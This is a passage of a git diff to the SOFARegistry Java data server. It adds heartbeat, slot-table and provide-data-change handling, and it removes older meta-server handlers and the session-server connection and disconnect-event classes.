currentSlotTable; + + @Override + protected long getCurrentSlotTableEpoch() { + return slotManager.getSlotTableEpoch(); + } + + @Override + public int getRenewIntervalSecs() { + return dataServerConfig.getSchedulerHeartbeatIntervalSecs(); + } + + @Override + protected void handleRenewResult(BaseHeartBeatResponse result) { + // the data/session list has updated in renewNode + Set dataServerList = getDataServerList(); + if (!CollectionUtils.isEmpty(dataServerList)) { + dataNodeExchanger.setServerIps(dataServerList); + dataNodeExchanger.notifyConnectServerAsync(); + } + Set sessionServerList = getSessionServerList(); + if (!CollectionUtils.isEmpty(sessionServerList)) { + sessionNodeExchanger.setServerIps(sessionServerList); + sessionNodeExchanger.notifyConnectServerAsync(); + } + if (result.getSlotTable() != null + && result.getSlotTable().getEpoch() != SlotTable.INIT.getEpoch()) { + slotManager.updateSlotTable(result.getSlotTable()); + } else { + LOGGER.warn("[handleRenewResult] not slot table result"); + } + } + + @Override + protected HeartbeatRequest createRequest() { + Tuple> tuple = slotManager.getSlotTableEpochAndStatuses(); + final long slotTableEpoch = tuple.o1; + final List slotStatuses = tuple.o2; + HeartbeatRequest request = + new HeartbeatRequest<>( + createNode(), + slotTableEpoch, + dataServerConfig.getLocalDataCenter(), + System.currentTimeMillis(), + SlotConfig.slotBasicInfo(), + slotStatuses) + .setSlotTable(currentSlotTable); + return request; + } + + private DataNode createNode() { + return new DataNode(new URL(ServerEnv.IP), dataServerConfig.getLocalDataCenter()); + } + + @VisibleForTesting + void setSlotManager(SlotManager slotManager) { + this.slotManager = slotManager; + } + + @VisibleForTesting + void setDataNodeExchanger(DataNodeExchanger dataNodeExchanger) { + this.dataNodeExchanger = dataNodeExchanger; + } + + @VisibleForTesting + void setSessionNodeExchanger(SessionNodeExchanger sessionNodeExchanger) { + this.sessionNodeExchanger = sessionNodeExchanger; + } + + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } + + @Override + public void record(SlotTable slotTable) { + currentSlotTable = new SlotTable(slotTable.getEpoch(), slotTable.getSlots()); + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/NotifyProvideDataChangeHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/NotifyProvideDataChangeHandler.java new file mode 100644 index 000000000..af3e25cfe --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/NotifyProvideDataChangeHandler.java @@ -0,0 +1,87 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.metaserver.handler; + +import com.alipay.sofa.registry.common.model.CommonResponse; +import com.alipay.sofa.registry.common.model.Node.NodeType; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.server.data.remoting.metaserver.provideData.ProvideDataProcessor; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.server.shared.remoting.AbstractClientHandler; +import com.alipay.sofa.registry.util.ParaCheckUtil; +import com.google.common.annotations.VisibleForTesting; +import java.util.concurrent.Executor; +import java.util.concurrent.ThreadPoolExecutor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version $Id: DataChangeRequestHandler.java, v 0.1 2017-12-12 15:09 shangyu.wh Exp $ + */ +public class NotifyProvideDataChangeHandler extends AbstractClientHandler { + + @Autowired private MetaServerService metaServerService; + + @Autowired private ProvideDataProcessor provideDataProcessorManager; + + @Autowired private ThreadPoolExecutor metaNodeExecutor; + + @Override + protected NodeType getConnectNodeType() { + return NodeType.META; + } + + @Override + public void checkParam(ProvideDataChangeEvent request) { + ParaCheckUtil.checkNotBlank(request.getDataInfoId(), "request.dataInfoId"); + } + + @Override + public Object doHandle(Channel channel, ProvideDataChangeEvent request) { + String dataInfoId = request.getDataInfoId(); + ProvideData provideData = metaServerService.fetchData(dataInfoId); + provideDataProcessorManager.changeDataProcess(provideData); + return null; + } + + @Override + public Class interest() { + return ProvideDataChangeEvent.class; + } + + @Override + public CommonResponse buildFailedResponse(String msg) { + return CommonResponse.buildFailedResponse(msg); + } + + @VisibleForTesting + void setMetaServerService(MetaServerService metaServerService) { + this.metaServerService = metaServerService; + } + + @VisibleForTesting + void setProvideDataProcessorManager(ProvideDataProcessor provideDataProcessorManager) { + this.provideDataProcessorManager = provideDataProcessorManager; + } + + @Override + public Executor getExecutor() { + return metaNodeExecutor; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/ServerChangeHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/ServerChangeHandler.java deleted file mode 100644 index 0174f5776..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/ServerChangeHandler.java +++ /dev/null @@ -1,95 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.metaserver.handler; - -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.common.model.metaserver.MetaNode; -import com.alipay.sofa.registry.common.model.metaserver.NodeChangeResult; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.event.DataServerChangeEvent; -import com.alipay.sofa.registry.server.data.event.EventCenter; -import com.alipay.sofa.registry.server.data.event.MetaServerChangeEvent; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractClientHandler; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.HashMap; -import java.util.Map; -import java.util.Set; - -/** - * - * @author qian.lqlq - * @version $Id: ServerChangeProcessor.java, v 0.1 2018-03-13 14:16 qian.lqlq Exp $ - */ -public class ServerChangeHandler extends AbstractClientHandler { - - @Autowired - private EventCenter eventCenter; - - @Autowired - private DataServerConfig dataServerConfig; - - @Override - public void checkParam(NodeChangeResult request) throws RuntimeException { - - } - - @Override - public Object doHandle(Channel channel, NodeChangeResult request) { - ExecutorFactory.getCommonExecutor().execute(() -> { - if (request.getNodeType() == NodeType.DATA) { - eventCenter.post(new DataServerChangeEvent(request.getNodes(), - request.getDataCenterListVersions())); - } else if (request.getNodeType() == NodeType.META) { - Map> metaNodesMap = request.getNodes(); - if (metaNodesMap != null && !metaNodesMap.isEmpty()) { - Map metaNodeMap = metaNodesMap.get(dataServerConfig.getLocalDataCenter()); - if (metaNodeMap != null && !metaNodeMap.isEmpty()) { - HashMap> map = new HashMap<>(); - map.put(dataServerConfig.getLocalDataCenter(), metaNodeMap.keySet()); - eventCenter.post(new MetaServerChangeEvent(map)); - } - } - } - }); - return CommonResponse.buildSuccessResponse(); - } - - @Override - public CommonResponse buildFailedResponse(String msg) { - return CommonResponse.buildFailedResponse(msg); - } - - @Override - public Class interest() { - return NodeChangeResult.class; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/StatusConfirmHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/StatusConfirmHandler.java deleted file mode 100644 index e5bb46f86..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/handler/StatusConfirmHandler.java +++ /dev/null @@ -1,67 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.metaserver.handler; - -import com.alipay.sofa.registry.common.model.CommonResponse; -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.metaserver.StatusConfirmRequest; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.server.data.cache.DataServerCache; -import com.alipay.sofa.registry.server.data.remoting.handler.AbstractClientHandler; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: StatusConfirmProcessor.java, v 0.1 2018-04-02 21:14 shangyu.wh Exp $ - */ -public class StatusConfirmHandler extends AbstractClientHandler { - - @Autowired - private DataServerCache dataServerCache; - - @Override - public void checkParam(StatusConfirmRequest request) throws RuntimeException { - - } - - @Override - public Object doHandle(Channel channel, StatusConfirmRequest request) { - dataServerCache.notifiedAll(); - return CommonResponse.buildSuccessResponse(); - } - - @Override - public CommonResponse buildFailedResponse(String msg) { - return CommonResponse.buildFailedResponse(msg); - } - - @Override - public Class interest() { - return StatusConfirmRequest.class; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } - - @Override - protected Node.NodeType getConnectNodeType() { - return Node.NodeType.DATA; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/ProvideDataProcessor.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/ProvideDataProcessor.java new file mode 100644 index 000000000..ecb4cedbc --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/ProvideDataProcessor.java @@ -0,0 +1,30 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.metaserver.provideData; + +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; + +/** + * @author kezhu.wukz + * @version 1.0: ProvideDataProcessor.java, v 0.1 2019-12-25 17:26 kezhu.wukz Exp $ + */ +public interface ProvideDataProcessor { + + void changeDataProcess(ProvideData provideData); + + boolean support(ProvideData provideData); +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/ProvideDataProcessorManager.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/ProvideDataProcessorManager.java new file mode 100644 index 000000000..940fec904 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/ProvideDataProcessorManager.java @@ -0,0 +1,48 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.metaserver.provideData; + +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import java.util.ArrayList; +import java.util.List; + +/** + * @author kezhu.wukz + * @version 1.0: ProvideDataProcessorManager.java, v 0.1 2019-12-25 17:39 kezhu.wukz Exp $ + */ +public class ProvideDataProcessorManager implements ProvideDataProcessor { + + private final List provideDataProcessors = new ArrayList<>(); + + public void addProvideDataProcessor(ProvideDataProcessor provideDataProcessor) { + provideDataProcessors.add(provideDataProcessor); + } + + @Override + public void changeDataProcess(ProvideData provideData) { + for (ProvideDataProcessor provideDataProcessor : provideDataProcessors) { + if (provideDataProcessor.support(provideData)) { + provideDataProcessor.changeDataProcess(provideData); + } + } + } + + @Override + public boolean support(ProvideData provideData) { + return false; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/processor/SessionLeaseProvideDataProcessor.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/processor/SessionLeaseProvideDataProcessor.java new file mode 100644 index 000000000..9d5db8870 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/provideData/processor/SessionLeaseProvideDataProcessor.java @@ -0,0 +1,66 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.remoting.metaserver.provideData.processor; + +import com.alipay.sofa.registry.common.model.constants.ValueConstants; +import com.alipay.sofa.registry.common.model.metaserver.ProvideData; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.lease.SessionLeaseManager; +import com.alipay.sofa.registry.server.data.remoting.metaserver.provideData.ProvideDataProcessor; +import com.google.common.annotations.VisibleForTesting; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author kezhu.wukz + * @version 1.0: DatumExpireProvideDataProcessor.java, v 0.1 2019-12-26 20:30 kezhu.wukz Exp $ + */ +public class SessionLeaseProvideDataProcessor implements ProvideDataProcessor { + private static final Logger LOGGER = + LoggerFactory.getLogger(SessionLeaseProvideDataProcessor.class); + + @Autowired private DataServerConfig dataServerConfig; + + @Override + public void changeDataProcess(ProvideData provideData) { + if (provideData == null) { + LOGGER.info("Fetch data sessionLease null"); + return; + } + + final Integer data = ProvideData.toInteger(provideData); + if (data == null) { + LOGGER.info("Fetch data sessionLease content null"); + return; + } + + LOGGER.info("Fetch sessionLeaseSec {}", data); + SessionLeaseManager.validateSessionLeaseSec(data); + dataServerConfig.setSessionLeaseSecs(data); + } + + @Override + public boolean support(ProvideData provideData) { + return ValueConstants.DATA_SESSION_LEASE_SEC.equals(provideData.getDataInfoId()); + } + + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/task/ConnectionRefreshMetaTask.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/task/ConnectionRefreshMetaTask.java deleted file mode 100644 index a36967ba0..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/metaserver/task/ConnectionRefreshMetaTask.java +++ /dev/null @@ -1,59 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.metaserver.task; - -import com.alipay.sofa.registry.server.data.event.EventCenter; -import com.alipay.sofa.registry.server.data.event.MetaServerChangeEvent; -import com.alipay.sofa.registry.server.data.remoting.dataserver.task.AbstractTask; -import com.alipay.sofa.registry.server.data.remoting.metaserver.IMetaServerService; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.concurrent.TimeUnit; - -/** - * - * @author shangyu.wh - * @version $Id: ConnectionRefreshMetaTask.java, v 0.1 2018-06-29 18:16 shangyu.wh Exp $ - */ -public class ConnectionRefreshMetaTask extends AbstractTask { - - @Autowired - private IMetaServerService metaServerService; - - @Autowired - private EventCenter eventCenter; - - @Override - public void handle() { - eventCenter.post(new MetaServerChangeEvent(metaServerService.getMetaServerMap())); - } - - @Override - public int getDelay() { - return 10; - } - - @Override - public int getInitialDelay() { - return 0; - } - - @Override - public TimeUnit getTimeUnit() { - return TimeUnit.SECONDS; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/SessionServerConnectionFactory.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/SessionServerConnectionFactory.java deleted file mode 100644 index e8072e5ca..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/SessionServerConnectionFactory.java +++ /dev/null @@ -1,186 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver; - -import com.alipay.remoting.Connection; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect.DisconnectEventHandler; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect.SessionServerDisconnectEvent; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.Collections; -import java.util.HashSet; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.ConcurrentHashMap; -import java.util.stream.Collectors; - -/** - * the factory to hold sesseionserver connections - * - * @author qian.lqlq - * @version $Id: SessionServerConnectionFactory.java, v 0.1 2017-12-06 15:48 qian.lqlq Exp $ - */ -public class SessionServerConnectionFactory { - private static final Logger LOGGER = LoggerFactory - .getLogger(SessionServerConnectionFactory.class); - - private static final int DELAY = 30 * 1000; - - /** - * collection of connections - * key : processId - * value : connection - */ - private final Map MAP = new ConcurrentHashMap<>(); - - /** - * key : sessionserver host - * value: sesseionserver processId - */ - private final Map PROCESSID_MAP = new ConcurrentHashMap<>(); - - /** - * key : sessionserver processId - * value: ip:port of clients - */ - private final Map> PROCESSID_CLIENT_MAP = new ConcurrentHashMap<>(); - - @Autowired - private DisconnectEventHandler disconnectEventHandler; - - /** - * register connection - * - * @param processId - * @param clientHosts - * @param connection - */ - public void register(String processId, Set clientHosts, Connection connection) { - String serverHost = NetUtil.toAddressString(connection.getRemoteAddress()); - if (LOGGER.isInfoEnabled()) { - LOGGER.info("session({}, processId={}) registered", serverHost, processId); - } - MAP.put(processId, new Pair(serverHost, connection)); - Set ret = PROCESSID_CLIENT_MAP.getOrDefault(processId, null); - if (ret == null) { - PROCESSID_CLIENT_MAP.putIfAbsent(processId, new HashSet<>()); - } - PROCESSID_CLIENT_MAP.get(processId).addAll(clientHosts); - PROCESSID_MAP.put(serverHost, processId); - } - - /** - * - * @param processId - * @param clientAddress - */ - public void registerClient(String processId, String clientAddress) { - Set ret = PROCESSID_CLIENT_MAP.getOrDefault(processId, null); - if (ret == null) { - PROCESSID_CLIENT_MAP.putIfAbsent(processId, new HashSet<>()); - } - PROCESSID_CLIENT_MAP.get(processId).add(clientAddress); - } - - /** - * remove connection by specific host - */ - public void removeProcess(String sessionServerHost) { - String processId = PROCESSID_MAP.remove(sessionServerHost); - if (LOGGER.isInfoEnabled()) { - LOGGER.info("session({}, processId={}) unregistered", sessionServerHost, processId); - } - if (processId != null) { - disconnectEventHandler.receive(new SessionServerDisconnectEvent(processId, - sessionServerHost, DELAY)); - } - } - - /** - * - * @param processId - */ - public Set removeClients(String processId) { - return PROCESSID_CLIENT_MAP.remove(processId); - } - - /** - * - * @param processId - * @return - */ - public boolean removeProcessIfMatch(String processId, String sessionServerHost) { - return MAP.remove(processId, new Pair(sessionServerHost, null)); - } - - /** - * get all connections - * - * @return - */ - public List getConnections() { - return MAP.size() <= 0 ? - Collections.EMPTY_LIST : - MAP.values().stream().map(Pair::getConnection).collect(Collectors.toList()); - } - - /** - * convenient class to store sessionServerHost and connection - */ - private static class Pair { - private String sessionServerHost; - private Connection connection; - - private Pair(String sessionServerHost, Connection connection) { - this.sessionServerHost = sessionServerHost; - this.connection = connection; - } - - @Override - public boolean equals(Object o) { - if (this == o) { - return true; - } - if (o == null || getClass() != o.getClass()) { - return false; - } - - Pair pair = (Pair) o; - - return sessionServerHost.equals(pair.sessionServerHost); - } - - @Override - public int hashCode() { - return sessionServerHost.hashCode(); - } - - /** - * Getter method for property connection. - * - * @return property value of connection - */ - private Connection getConnection() { - return connection; - } - - } -} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/ClientDisconnectEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/ClientDisconnectEvent.java deleted file mode 100644 index 3659db591..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/ClientDisconnectEvent.java +++ /dev/null @@ -1,51 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect; - -/** - * - * @author qian.lqlq - * @version $Id: ClientDisconnectEvent.java, v 0.1 2018-04-14 18:22 qian.lqlq Exp $ - */ -public class ClientDisconnectEvent extends DisconnectEvent { - - private String host; - - /** - * constructor - * @param host - * @param registerTimestamp - * @param timeoutMs - */ - public ClientDisconnectEvent(String host, long registerTimestamp, int timeoutMs) { - this.host = host; - setRegisterTimestamp(registerTimestamp); - setGmtOccur(System.currentTimeMillis()); - setTimeoutMs(timeoutMs); - setType(DisconnectTypeEnum.CLIENT); - } - - /** - * Getter method for property host. - * - * @return property value of host - */ - public String getHost() { - return host; - } - -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/DisconnectEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/DisconnectEvent.java deleted file mode 100644 index 557ebee68..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/DisconnectEvent.java +++ /dev/null @@ -1,132 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect; - -import java.util.concurrent.Delayed; -import java.util.concurrent.TimeUnit; - -/** - * - * @author qian.lqlq - * @version $Id: DisconnectEvent.java, v 0.1 2018-04-14 18:22 qian.lqlq Exp $ - */ -public class DisconnectEvent implements Delayed { - - private int timeoutMs; - - private long gmtOccur; - - private long registerTimestamp; - - private DisconnectTypeEnum type; - - @Override - public long getDelay(TimeUnit unit) { - return unit.convert(getGmtOccur() + getTimeoutMs() - System.currentTimeMillis(), - TimeUnit.MILLISECONDS); - } - - @Override - public int compareTo(Delayed o) { - if (o == this) { - return 0; - } - if (o instanceof DisconnectEvent) { - DisconnectEvent other = (DisconnectEvent) o; - if (this.gmtOccur < other.gmtOccur) { - return -1; - } else if (this.gmtOccur > other.gmtOccur) { - return 1; - } else { - return 0; - } - } - return -1; - } - - /** - * Getter method for property timeoutMs. - * - * @return property value of timeoutMs - */ - public int getTimeoutMs() { - return timeoutMs; - } - - /** - * Setter method for property timeoutMs. - * - * @param timeoutMs value to be assigned to property timeoutMs - */ - public void setTimeoutMs(int timeoutMs) { - this.timeoutMs = timeoutMs; - } - - /** - * Getter method for property gmtOccur. - * - * @return property value of gmtOccur - */ - public long getGmtOccur() { - return gmtOccur; - } - - /** - * Setter method for property gmtOccur. - * - * @param gmtOccur value to be assigned to property gmtOccur - */ - public void setGmtOccur(long gmtOccur) { - this.gmtOccur = gmtOccur; - } - - /** - * Getter method for property registerTimestamp. - * - * @return property value of registerTimestamp - */ - public long getRegisterTimestamp() { - return registerTimestamp; - } - - /** - * Setter method for property registerTimestamp. - * - * @param registerTimestamp value to be assigned to property registerTimestamp - */ - public void setRegisterTimestamp(long registerTimestamp) { - this.registerTimestamp = registerTimestamp; - } - - /** - * Getter method for property type. - * - * @return property value of type - */ - public DisconnectTypeEnum getType() { - return type; - } - - /** - * Setter method for property type. - * - * @param type value to be assigned to property type - */ - public void setType(DisconnectTypeEnum type) { - this.type = type; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/DisconnectEventHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/DisconnectEventHandler.java deleted file mode 100644 index f262b420f..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/remoting/sessionserver/disconnect/DisconnectEventHandler.java +++ /dev/null @@ -1,124 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.remoting.sessionserver.disconnect; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.change.event.ClientChangeEvent; -import com.alipay.sofa.registry.server.data.change.event.DataChangeEventCenter; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import com.alipay.sofa.registry.server.data.remoting.sessionserver.SessionServerConnectionFactory; -import org.springframework.beans.factory.InitializingBean; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.Set; -import java.util.concurrent.DelayQueue; -import java.util.concurrent.Executor; - -/** - * @author qian.lqlq - * @version $Id: ClientDisconnectEventHandler.java, v 0.1 2017-12-07 15:32 qian.lqlq Exp $ - */ -public class DisconnectEventHandler implements InitializingBean { - - private static final Logger LOGGER = LoggerFactory - .getLogger(DisconnectEventHandler.class); - - /** - * a DelayQueue that contains client disconnect events - */ - private final DelayQueue EVENT_QUEUE = new DelayQueue<>(); - - @Autowired - private SessionServerConnectionFactory sessionServerConnectionFactory; - - @Autowired - private 